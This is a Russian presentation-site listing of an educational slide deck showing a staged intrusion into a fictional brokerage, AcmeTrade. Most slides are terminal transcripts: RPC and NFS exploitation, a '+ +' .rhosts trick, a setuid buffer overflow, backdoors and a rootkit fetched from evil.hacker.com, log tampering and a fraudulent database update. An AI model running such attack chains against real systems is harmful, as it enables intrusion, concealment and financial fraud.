Презентация на тему "Пример сетевой атаки"

Скачать презентацию (0.83 Мб)
14 загрузок
4.0 оценка

1 из 35

ВКонтакте Одноклассники Мой Мир Телеграм

Ваша оценка презентации

Оцените презентацию по шкале от 1 до 5 баллов

4.0

1 оценка

Аннотация к презентации

Презентация для студентов на тему "Пример сетевой атаки" по информатике. Состоит из 35 слайдов. Размер файла 0.83 Мб. Каталог презентаций в формате powerpoint. Можно бесплатно скачать материал к себе на компьютер или смотреть его онлайн.

Формат

pptx (powerpoint)
Количество слайдов

35
Слова

информатика интернет сети защита данных сетевые атаки
Конспект

Отсутствует

Содержание

Слайд 1
Пример атаки
Слайд 2
Слайд 3

WHOIS Search
Слайд 4

ACMETRADE.COM
Слайд 5

Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338 Domain Name: ACMETRADE.COM Administrative Contact: Vaughn, Danon (ES2394) dvaughn@ACMETRADE.COM (678)443-6000 (FAX) (678) 443-6476 Technical Contact, Zone Contact: Bergman, Bret (ET2324) bbergman@ACMETRADE.COM (678)443-6100 (FAX) (678) 443-6208 Billing Contact: Fields, Hope (ET3427) hfields@ACMETRADE.COM (678)443-6101 (FAX) (678) 443-6401 Record Last updated on 27-Jul-99. Record created on 06-Mar-98. Database last updated on 4-Oct-99 09:09:01 EDT Domain servers in listed order: dns.acmetrade.com 208.21.2.67 www.acmetrade.com 208.21.2.10 www1.acmetrade.com 208.21.2.12 www2.acmetrade.com 208.21.2.103 http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com
Слайд 6

hacker:/export/home/hacker> ./rpcscan dns.acmetrade.com cmsd Scanning dns.acmetrade.com for program 100068 cmsd is on port 33505 hacker:/export/home/hacker>
Слайд 7
Слайд 8
Слайд 9

hacker:/export/home/hacker> id uid=1002(hacker) gid=10(staff) hacker:/export/home/hacker> uname -a SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Engine hacker:/export/home/hacker> ./cmsd dns.acmetrade.com using source port 53 rtable_create worked Exploit successful. Portshell created on port 33505 hacker:/export/home/hacker> Trying 208.21.2.67... Connected to dns.acmetrade.com. Escape character is '^]'. # id uid=0(root) gid=0(root) # uname -a SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5 # telnet dns.acmetrade.com 33505
Слайд 10

# # nslookup Default Server: dns.acmetrade.com Address: 208.21.2.67 > > ls acmetrade.com Received 15 records. ^D [dns.acmetrade.com] www.acmetrade.com 208.21.2.10 www1.acmetrade.com 208.21.2.12 www2.acmetrade.com 208.21.2.103 margin.acmetrade.com 208.21.4.10 marketorder.acmetrade.com 208.21.2.62 deriv.acmetrade.com 208.21.2.25 deriv1.acmetrade.com 208.21.2.13 bond.acmetrade.com 208.21.2.33 ibd.acmetrade.com 208.21.2.27 fideriv.acmetrade.com 208.21.4.42 backoffice.acmetrade.com 208.21.4.45 wiley.acmetrade.com 208.21.2.29 bugs.acmetrade.com 208.21.2.89 fw.acmetrade.com 208.21.2.94 fw1.acmetrade.com 208.21.2.21
Слайд 11

# # # # rpcinfo -p www.acmetrade.com | grep mountd 100005 1 udp 643 mountd 100005 1 tcp 647 mountd showmount -e www.acmetrade.com /usr/local server2, server3, server4 /export/home sunspot rpcinfo -p www1.acmetrade.com | grep mountd 100005 1 udp 643 mountd 100005 1 tcp 647 mountd showmount -e www1.acmetrade.com /data1 server2 /a engineering /b engineering /c engineering /export/home (everyone) export list for www.acmetrade.com: #
Слайд 12

nfs
Слайд 13

nfsshell.c
Слайд 14

/data1 server2 /a engineering /b engineering /c engineering /export/home (everyone) Export list for www1.acmetrade.com: nfs> mount /export/home Mount www1.acmetrade.com[208.21.2.12]:/export/home nfs> ls bill bob celeste chuck dan dave jenn zack nfs> ls –l bob drwxr-xr-x 2 201 1 1024 May 4 1999 bob - protocol: UDP/IP - transfer size: 8192 bytes nfs> nfs> nfs> cd bob uid 201 gid 1 # nfsshell nfs> host www1.acmetrade.com Open www1.acmetrade.com[208.21.1.12] (mountd) using UDP/IP nfs> export
Слайд 15

nfs> status User id : 201 Group id : 1 Remote host : ‘www1.acmetrade.com’ Mount path : ‘/export/home’ Transfer size: 8192 nfs> !sh $ echo "+ +" > .rhosts $ exit nfs> nfs> put .rhosts cat .rhosts + + nfs> exit # rlogin -l bob www1.acmetrade.com Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com www1% whoami bob www1% pwd /export/home/bob www1% uname -a SunOS www1.acmetrade.com 5.5.1 Generic_103640-24 sun4d SUNW,SPARCserver-1000 www1% cat .rhosts + +
Слайд 16
Слайд 17
Слайд 18

www1% www1% ls -la /usr/bin/eject -r-sr-xr-x 1 root bin 13144 Jul 15 1997 /usr/bin/eject* www1% gcc -o eject_overflow eject_overflow.c www1% ./eject_overflow Jumping to address 0xeffff630 B[364] E[400] SO[400] # whoami root # ftp evil.hacker.com Connected to evil.hacker.com. Name (evil.hacker.com:root): 331 Password required for hacker. Password: 230 User hacker logged in. Remote system type is UNIX. Using binary mode to transfer files. hacker eye0wnu 220 evil.hacker.com FTP server (HackerOS) ready.
Слайд 19

ftp> cd solaris_backdoors 250 CWD command successful. ftp> get solaris_backdoor.tar.gz 200 PORT command successful. 150 Binary data connection for out 3.1.33.7,1152). 226 Transfer complete. 152323 bytes sent in 31.942233 secs (4.7Kbytes/sec) ftp> quit tar -xf module_backdoor.tar cd /tmp/my_tools gunzip module_backdoor.tar.gz # # #
Слайд 20

# cd /tmp/my_tools/module_backdoor # ./configure Enter directories and filenames to hide from ls, find, du: # make gcc -c backdoor.c gcc -o installer installer.c ld –o backdoor –r backdoor.o # Makefile backdoor backdoor.c backdoor.o config.h configure installer installer.c ls # # modload backdoor ./installer -d /usr/local/share/... Adding directory... Fixing last modified time... Fixing last accessed time... ... backdoor Enter class C network to hide from netstat: Enter process names to hide from ps and lsof: creating config.h... 3.1.33.0 sniffer
Слайд 21

# ls -la /usr/local/share/... ...: No such file or directory # # # # # # ./installer backdoor /usr/local/share/.../backdoor Installing file... Fixing last modified time... Fixing last accessed time... echo "/usr/sbin/modload /usr/local/share/.../backdoor" >>/etc/init.d/utmpd # cd .. rm -rf module_backdoor ls inetd_backdoor/ logedit sniffer ./installer sniffer /usr/local/share/.../sniffer Installing file... Fixing last modified time... Fixing last accessed time... ls /usr/local/share/.../sniffer /usr/local/share/.../sniffer: No such file or directory # cd /usr/local/share/... # ./sniffer > out & # ps -aef | grep sniffer #
Слайд 22

# netstat TCP Local Address Remote Address Swind Send-Q Rwind Recv-Q State -------------------- -------------------- ----- ------ ----- ------ ------- 208.21.2.10.1023 208.21.0.19.2049 8760 0 8760 648 ESTABLISHED 208.21.2.10.1022 208.21.0.19.2049 8760 0 8760 0 ESTABLISHED 208.21.2.10.2049 208.21.0.13.1003 8760 0 8760 0 ESTABLISHED # cd /tmp/my_tools # cd inetd_backdoor # ls config.h configure inetd.c installer.c # ./configure Enter port for hidden shell: # make gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv gcc -o installer installer.c # installer inetd /usr/sbin/inetd Installing file... Fixing last modified time... Fixing last accessed time... creating config.h... creating Makefile... 31337
Слайд 23

Trying 208.21.2.12... Escape character is '^]'. telnet www1.acmetrade.com 31337 Granting rootshell... # hostname www1 # whoami root # # ps –aef | grep inetd root 179 1 0 May 10 ? 1:26 /usr/sbin/inetd -s # # kill –9 179 # exit /usr/sbin/inetd –s & Connection closed by foreign host. hacker:/export/home/hacker>
Слайд 24

hacker:/export/home/hacker> ftp www1.acmetrade.com Connected to www1 220 www1.acmetrade.com FTP service (Version 2.5). Name: root 331 Password required for root. Password: ******* 230 User root logged in. Remote system type is Unix. ftp> put backdoor.html securelogin.html 200 PORT command successful. 150 Opening BINARY mode data connection for index.html 226 Transfer complete. ftp> quit 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 10 -rwxr-xr-x 9 root other 1024 Aug 17 17:07 . -rwxr-xr-x 9 root other 1024 Aug 17 17:07 .. -rwxr-xr-x 2 www www 2034 Aug 17 17:07 index.html -rwxr-xr-x 2 www www 1244 Aug 17 17:07 securelogin.html -rwxr-xr-x 2 www www 1024 Aug 17 17:07 image2.gif -rwxr-x--x 6 www www 877 Aug 17 17:07 title.gif -rwxr-xr-x 2 www www 1314 Aug 17 17:07 frontpage.jpg 226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec) ftp> dir ftp> cd /usr/local/httpd
Слайд 25

program vers proto port service 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100000 2 udp 111 rpcbind 100004 2 udp 753 ypserv 100004 1 udp 753 ypserv 100004 1 tcp 754 ypserv 100004 2 tcp 32771 ypserv 1073741824 2 udp 32772 100007 3 udp 32779 ypbind 100007 2 udp 32779 ypbind 100007 1 udp 32779 ypbind 100007 3 tcp 32772 ypbind 100007 2 tcp 32772 ypbind 100007 1 tcp 32772 ypbind 100011 1 udp 32781 rquotad 100068 2 udp 32783 100068 3 udp 32783 100068 4 udp 32783 100068 5 udp 32783 100024 1 udp 32784 status 100024 1 tcp 32777 status 100021 1 udp 4045 nlockmgr 100021 2 udp 4045 nlockmgr # rpcinfo -p backoffice.acmetrade.com
Слайд 26

100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr 100021 1 tcp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100021 3 tcp 4045 nlockmgr 100021 4 tcp 4045 nlockmgr 100005 1 udp 33184 mountd 100005 2 udp 33184 mountd 100005 3 udp 33184 mountd 100005 1 tcp 32787 mountd 100005 2 tcp 32787 mountd 100005 3 tcp 32787 mountd 100083 1 tcp 32773 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100227 2 udp 2049 nfs_acl 100227 3 udp 2049 nfs_acl 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100227 2 tcp 2049 nfs_acl 100227 3 tcp 2049 nfs_acl # # grep ttdbserverd /etc/inetd.conf 100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd rpcinfo -p backoffice.acmetrade.com | grep 100083 100083 1 tcp 32773 # cd /tmp/mytools/warez
Слайд 27

Please wait for your root shell. # ./tt backoffice.acmetrade.com hostname backoffice whoami root # find / -type f -name .rhosts -print /.rhosts /export/home/chuck/.rhosts /export/home/bill/.rhosts /export/home/larry/.rhosts # cat /.rhosts fideriv.acmetrade root ibd.acmetrade root bugs.acmetrade root # w 10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03 User tty login@ idle JCPU PCPU what root console 9:27am 147:52 14:41 14:14 /sbin/sh root pts/5 9:24pm /sbin/sh # # # /tmp/mytools/logedit root pts/5 # w 10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03 User tty login@ idle JCPU PCPU what root console 9:27am 147:52 14:41 14:14 /sbin/sh
Слайд 28

# sqlplus oracle/oracle SQL> describe customers Name Null? Type ------------------ -------- ----------- LNAME NOT NULL VARCHAR2(20) FNAME NOT NULL VARCHAR2(15) ADDR1 NOT NULL VARCHAR2(30) ZIP NOT NULL NUMBER(5) PHONE NOT NULL CHAR(12) ACCOUNT_NUM NOT NULL NUMBER(12) BALANCE NOT NULL NUMBER(12) MARGIN_LIMIT NOT NULL NUMBER(12) ACCT_OPEN NOT NULL DATE SQL> select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski'; LNAME FNAME ACCOUNT_NUM MARGIN_LIMIT -------------------- ------------- ----------- ------------ Gerulski David 5820981 50000.00 SQL> update customers set MARGIN_LIMIT = 500000.00 where LNAME = 'Gerulski'; SQL> select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski'; LNAME MARGIN_LIMIT ------------------- ------------ Gerulski 500000.00 SQL> exit
Слайд 29
Слайд 30
Anatomy of the Attack

AcmeTrade’s Network UNIX Firewall DNS Server Web Server Filtering Router NT Clients & Workstations Network UNIX NT UNIX rpc.cmsd nfs / eject tooltalk /oracle
Слайд 31
What is Vulnerable?

IT Infrastructure Firewall E-Mail Server Web Server Router Servers Clients & Workstations Network
Слайд 32

Applications Router E-Commerce Web Server E-Mail Server Firewall SAP Peoplesoft Web Browsers
Слайд 33

Databases Firewall Router Oracle Microsoft SQL Server Sybase
Слайд 34

Firewall AIX Solaris Router Windows NT Network Operating Systems HP-UX Windows 95 & NT
Слайд 35

Firewall E-Mail Server Web Server Router Servers Networks TCP/IP Netware